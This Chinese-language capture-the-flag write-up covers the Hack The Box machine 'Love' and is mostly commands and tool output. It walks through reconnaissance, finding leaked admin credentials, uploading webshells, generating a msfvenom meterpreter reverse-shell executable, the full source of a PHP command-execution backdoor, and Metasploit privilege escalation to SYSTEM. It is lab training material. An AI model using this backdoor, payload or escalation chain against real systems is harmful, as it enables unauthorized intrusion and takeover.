HTB-love

0x00.简述

0x01.信息收集

信息如下，可以看到http端口有80、5000，在443端口下可以看到staging.love.htb，添加一条hosts

10.10.10.239 staging.love.htb

┌──(root💀kali)-[~/htb/love]
└─# nmap -sC -sV -sT 10.10.10.239 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:31 EDT
Nmap scan report for staging.love.htb (10.10.10.239)
Host is up (0.40s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Secure file scanner
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings:
|   GetRequest, Help, LDAPSearchReq, NULL:
|_    Host '10.10.17.216' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=8/5%Time=610B77EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.17\.216'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.17\.216'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4B,"G\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.17\.216'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchReq,4B,"G\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.17\.216'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h45m34s, deviation: 4h02m32s, median: 25m32s
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-04T22:58:30-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-08-05T05:58:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.66 seconds

0x02.访问80端口

就一个登入框

0x03.访问5000端口

发现没有权限

0x04.列一下目录

可以发现admin dist images includes plugins，访问这些目录并没有发现什么敏感信息

┌──(root💀kali)-[~/htb/love]
└─# gobuster dir -u http://10.10.10.239 -w /usr/share/wordlists/dirb/common.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.239
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/05 01:49:07 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 302]
/.hta                 (Status: 403) [Size: 302]
/ADMIN                (Status: 301) [Size: 337] [--> http://10.10.10.239/ADMIN/]
/Admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/Admin/]
/admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/admin/]
/aux                  (Status: 403) [Size: 302]
/cgi-bin/             (Status: 403) [Size: 302]
/com2                 (Status: 403) [Size: 302]
/com3                 (Status: 403) [Size: 302]
/com1                 (Status: 403) [Size: 302]
/con                  (Status: 403) [Size: 302]
/dist                 (Status: 301) [Size: 336] [--> http://10.10.10.239/dist/]
/examples             (Status: 503) [Size: 402]
/images               (Status: 301) [Size: 338] [--> http://10.10.10.239/images/]
/Images               (Status: 301) [Size: 338] [--> http://10.10.10.239/Images/]
/includes             (Status: 301) [Size: 340] [--> http://10.10.10.239/includes/]
/index.php            (Status: 200) [Size: 4388]
/licenses             (Status: 403) [Size: 421]
/lpt1                 (Status: 403) [Size: 302]
/lpt2                 (Status: 403) [Size: 302]
/nul                  (Status: 403) [Size: 302]
/phpmyadmin           (Status: 403) [Size: 302]
/plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/plugins/]
/prn                  (Status: 403) [Size: 302]
/server-status        (Status: 403) [Size: 421]
/server-info          (Status: 403) [Size: 421]
/webalizer            (Status: 403) [Size: 302]

===============================================================
2021/08/05 01:49:46 Finished
===============================================================

0x05.访问admin目录

这里的admin目录与默认登入框还有些不同

0x06.访问域名staging.love.htb

可以看到这是一个网页爬虫工具，并且有一个demo示例

测试80与5000端口

在5000端口得到admin口令

0x07.admin登入

user:admin

pass:@LoveIsInTheAir!!!!

手动爬虫，发现可以在photo处上传文件，之后测试，发现文件类型不限制

上传kali自带反弹shell但是失败了

0x08.使用Godzilla

1.首先生成shell

2.上传

3.访问get shell

Godzilla添加目标

这里使用Godzilla反弹meterpreter shell失败了

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:5555 
[*] Sending stage (39282 bytes) to 10.10.10.239
[*]  - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 1 is not valid and will be closed

0x09.使用Behinder

Godzilla反弹shell失败了，这里使用Behinder成功了，但是也不能提权。。。。

0x10.提权

使用msfvenom提权

┌──(root💀kali)-[/usr/share/webshells/php]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.17.216 LPORT=6666 -f exe > /root/htb/love/sb.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
                                       

先上传一个可以执行系统命令的小马，再上传sb.exe反弹shell

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

开启msf监听

msf6 exploit(multi/handler) > options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.17.216     yes       The listen address (an interface may be specified)
   LPORT     6666             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.216:6666 

执行sb.exe

得到shell，但是不能提权

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.216:6666 
[*] Sending stage (175174 bytes) to 10.10.10.239
[*] Meterpreter session 10 opened (10.10.17.216:6666 -> 10.10.10.239:52612) at 2021-08-05 04:07:09 -0400

meterpreter > getuid
Server username: LOVE\Phoebe
meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > 

使用always_install_elevated提权

meterpreter > background 
[*] Backgrounding session 10...
msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information         Connection
  --  ----  ----                     -----------         ----------
  10        meterpreter x86/windows  LOVE\Phoebe @ LOVE  10.10.17.216:6666 -> 10.10.10.239:52612 (10.10.10.239)

msf6 exploit(multi/handler) > use exploit/windows/local/always_install_elevated 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set session 10
session => 10
msf6 exploit(windows/local/always_install_elevated) > options 

Module options (exploit/windows/local/always_install_elevated):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  10               yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.17.216     yes       The listen address (an interface may be specified)
   LPORT     6666             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/always_install_elevated) > run

[*] Started reverse TCP handler on 10.10.17.216:6666 
[*] Uploading the MSI to C:\Users\Phoebe\AppData\Local\Temp\pqfzrkZhtqhj.msi ...
[*] Executing MSI...
[*] Sending stage (175174 bytes) to 10.10.10.239
[+] Deleted C:\Users\Phoebe\AppData\Local\Temp\pqfzrkZhtqhj.msi
[*] Meterpreter session 11 opened (10.10.17.216:6666 -> 10.10.10.239:52625) at 2021-08-05 04:10:28 -0400

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd /
meterpreter > pwd
C:\
meterpreter > dir
Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   4096    dir   2015-07-10 07:04:22 -0400  $Recycle.Bin
40777/rwxrwxrwx   0       dir   2021-04-12 16:17:58 -0400  $WinREAgent
40777/rwxrwxrwx   4096    dir   2021-04-12 15:55:58 -0400  Administration
100666/rw-rw-rw-  1       fil   2015-07-10 09:20:06 -0400  BOOTNXT
40777/rwxrwxrwx   0       dir   2015-07-10 08:21:38 -0400  Documents and Settings
0000/---------    0       fif   1969-12-31 19:00:00 -0500  DumpStack.log.tmp
40777/rwxrwxrwx   0       dir   2019-12-07 04:14:52 -0500  PerfLogs
40555/r-xr-xr-x   4096    dir   2019-12-07 04:14:52 -0500  Program Files
40555/r-xr-xr-x   4096    dir   2019-12-07 04:14:52 -0500  Program Files (x86)
40777/rwxrwxrwx   4096    dir   2019-12-07 04:14:52 -0500  ProgramData
40777/rwxrwxrwx   0       dir   2021-04-12 15:18:22 -0400  Recovery
40777/rwxrwxrwx   4096    dir   2021-04-12 15:16:36 -0400  System Volume Information
40555/r-xr-xr-x   4096    dir   2019-12-07 04:03:44 -0500  Users
40777/rwxrwxrwx   16384   dir   2019-12-07 04:03:44 -0500  Windows
100444/r--r--r--  395268  fil   2015-07-10 09:20:06 -0400  bootmgr
0000/---------    0       fif   1969-12-31 19:00:00 -0500  pagefile.sys
0000/---------    0       fif   1969-12-31 19:00:00 -0500  swapfile.sys
40777/rwxrwxrwx   12288   dir   2021-04-12 11:16:48 -0400  xampp

meterpreter > cd Users
meterpreter > dir
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2021-04-12 17:06:49 -0400  Administrator
40777/rwxrwxrwx   0     dir   2019-12-07 04:30:39 -0500  All Users
40555/r-xr-xr-x   8192  dir   2019-12-07 04:03:44 -0500  Default
40777/rwxrwxrwx   0     dir   2019-12-07 04:30:39 -0500  Default User
40777/rwxrwxrwx   8192  dir   2021-04-12 17:41:34 -0400  Phoebe
40555/r-xr-xr-x   4096  dir   2019-12-07 04:14:52 -0500  Public
100666/rw-rw-rw-  174   fil   2019-12-07 04:14:54 -0500  desktop.ini

meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Users\Administrator
===============================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40555/r-xr-xr-x   0        dir   2021-04-12 17:55:12 -0400  3D Objects
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:49 -0400  AppData
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  Application Data
40555/r-xr-xr-x   0        dir   2021-04-12 17:55:12 -0400  Contacts
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  Cookies
40555/r-xr-xr-x   0        dir   2021-04-12 17:06:49 -0400  Desktop
40555/r-xr-xr-x   4096     dir   2021-04-12 17:06:49 -0400  Documents
40555/r-xr-xr-x   0        dir   2021-04-12 17:06:49 -0400  Downloads
40555/r-xr-xr-x   0        dir   2021-04-12 17:06:49 -0400  Favorites
40555/r-xr-xr-x   0        dir   2021-04-12 17:06:49 -0400  Links
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  Local Settings
40555/r-xr-xr-x   0        dir   2021-04-12 17:06:49 -0400  Music
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  My Documents
100666/rw-rw-rw-  1048576  fil   2021-04-12 17:06:49 -0400  NTUSER.DAT
100666/rw-rw-rw-  65536    fil   2021-04-12 17:06:50 -0400  NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf
100666/rw-rw-rw-  524288   fil   2021-04-12 17:06:50 -0400  NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer0000000000
                                                            0000000001.regtrans-ms
100666/rw-rw-rw-  524288   fil   2021-04-12 17:06:50 -0400  NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer0000000000
                                                            0000000002.regtrans-ms
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  NetHood
40555/r-xr-xr-x   0        dir   2021-04-12 18:00:20 -0400  OneDrive
40555/r-xr-xr-x   0        dir   2021-04-12 17:06:49 -0400  Pictures
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  PrintHood
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  Recent
40555/r-xr-xr-x   0        dir   2021-04-12 17:06:49 -0400  Saved Games
40555/r-xr-xr-x   0        dir   2021-04-12 17:55:12 -0400  Searches
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  SendTo
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  Start Menu
40777/rwxrwxrwx   0        dir   2021-04-12 17:06:50 -0400  Templates
40555/r-xr-xr-x   0        dir   2021-04-12 17:06:49 -0400  Videos
100666/rw-rw-rw-  316416   fil   2021-04-12 17:06:50 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  90112    fil   2021-04-12 17:06:50 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20       fil   2021-04-12 17:06:50 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2021-04-12 17:55:12 -0400  desktop.ini
100444/r--r--r--  34    fil   2021-04-13 06:20:17 -0400  root.txt

meterpreter > cat root.txt 
*************************************
meterpreter >